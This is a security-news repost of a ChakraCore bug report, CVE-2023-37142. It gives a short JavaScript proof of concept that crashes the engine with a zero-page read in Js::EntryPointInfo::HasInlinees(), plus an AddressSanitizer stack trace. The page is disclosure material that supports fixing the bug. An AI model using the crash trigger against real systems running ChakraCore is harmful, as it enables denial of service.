Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37142: SEGV (/root/ChakraCore-latest/out/Release/ch+0x6e3fff) in Js::EntryPointInfo::HasInlinees() · Issue #6887 · chakra-core/ChakraCore

ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::EntryPointInfo::HasInlinees().

CVE
#linux#js#java#amd

Branch: master
Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17
POC is:

async function f1() {
    await null;
    throw WScript.f2a(f1());
}
f1();

async function f2() {

    async function f2a() {
        throw "err";
    }

    async function f2b() {
        try {
            var p = f2a();
        } catch (e) {
            console.log("caught " + e);
        }
    }

    async function f2c() {
        var p = f2a();
    }

    f2b();
    f2c();
}
f2();

In release build
./build.sh --sanitize=address --static -j
I get:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==10354==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x55d5e2d0b000 bp 0x7ffd7e5a66e0 sp 0x7ffd7e5a66e0 T0)
==10354==The signal is caused by a READ memory access.
==10354==Hint: address points to the zero page.
    #0 0x55d5e2d0afff in Js::EntryPointInfo::HasInlinees() (/root/ChakraCore-latest/out/Release/ch+0x6e3fff)
    #1 0x55d5e343229f in Js::InlinedFrameWalker::FromPhysicalFrame(Js::InlinedFrameWalker&, Js::Amd64StackFrame&, Js::ScriptFunction*, bool, int, Js::JavascriptStackWalker const*, bool, bool) (/root/ChakraCore-latest/out/Release/ch+0xe0b29f)
    #2 0x55d5e34333d4 in Js::JavascriptStackWalker::UpdateFrame(bool) (/root/ChakraCore-latest/out/Release/ch+0xe0c3d4)
    #3 0x55d5e342e90f in Js::JavascriptStackWalker::Walk(bool) (/root/ChakraCore-latest/out/Release/ch+0xe0790f)
    #4 0x55d5e343537e in Js::JavascriptStackWalker::GetCaller(Js::JavascriptFunction**, bool) (/root/ChakraCore-latest/out/Release/ch+0xe0e37e)
    #5 0x55d5e3435f56 in Js::JavascriptStackWalker::GetCaller(Js::JavascriptFunction**, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xe0ef56)
    #6 0x55d5e33dfe6d in Js::JavascriptOperators::PatchGetMethodFromObject(void*, Js::RecyclableObject*, int, Js::PropertyValueInfo*, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xdb8e6d)
    #7 0x55d5e33dfaf7 in Js::JavascriptOperators::PatchGetMethodNoFastPath(Js::FunctionBody*, Js::InlineCache*, unsigned int, void*, int) (/root/ChakraCore-latest/out/Release/ch+0xdb8af7)
    #8 0x55d5e3450c85 in void* Js::ProfilingHelpers::ProfiledLdFld<false, true, false>(void*, int, Js::InlineCache*, unsigned int, Js::FunctionBody*, void*) (/root/ChakraCore-latest/out/Release/ch+0xe29c85)
    #9 0x55d5e3127bcf in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xb00bcf)
    #10 0x55d5e30791dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
    #11 0x55d5e307756f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #12 0x55d5e30768ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #13 0x7f6f2c750f99  (<unknown module>)
    #14 0x55d5e3961ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #15 0x55d5e35ed2d5 in Js::JavascriptGenerator::CallGenerator(void*, Js::ResumeYieldKind) (/root/ChakraCore-latest/out/Release/ch+0xfc62d5)
    #16 0x55d5e35ac1dc in Js::JavascriptAsyncFunction::AsyncSpawnStep(Js::JavascriptAsyncSpawnStepFunction*, Js::JavascriptGenerator*, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0xf851dc)
    #17 0x55d5e35ac9eb in Js::JavascriptAsyncFunction::EntryAsyncSpawnCallStepFunction(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xf859eb)
    #18 0x55d5e381e5ee in Js::JavascriptPromise::EntryReactionTaskFunction(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x11f75ee)
    #19 0x55d5e3961ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #20 0x55d5e35dda61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
    #21 0x55d5e35dd72f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
    #22 0x55d5e2ad675a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
    #23 0x55d5e29feb1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
    #24 0x55d5e29db804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
    #25 0x55d5e29de913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
    #26 0x55d5e29df606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
    #27 0x7f6f30c78c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    #28 0x55d5e28ddd59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0x6e3fff) in Js::EntryPointInfo::HasInlinees()
==10354==ABORTING

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907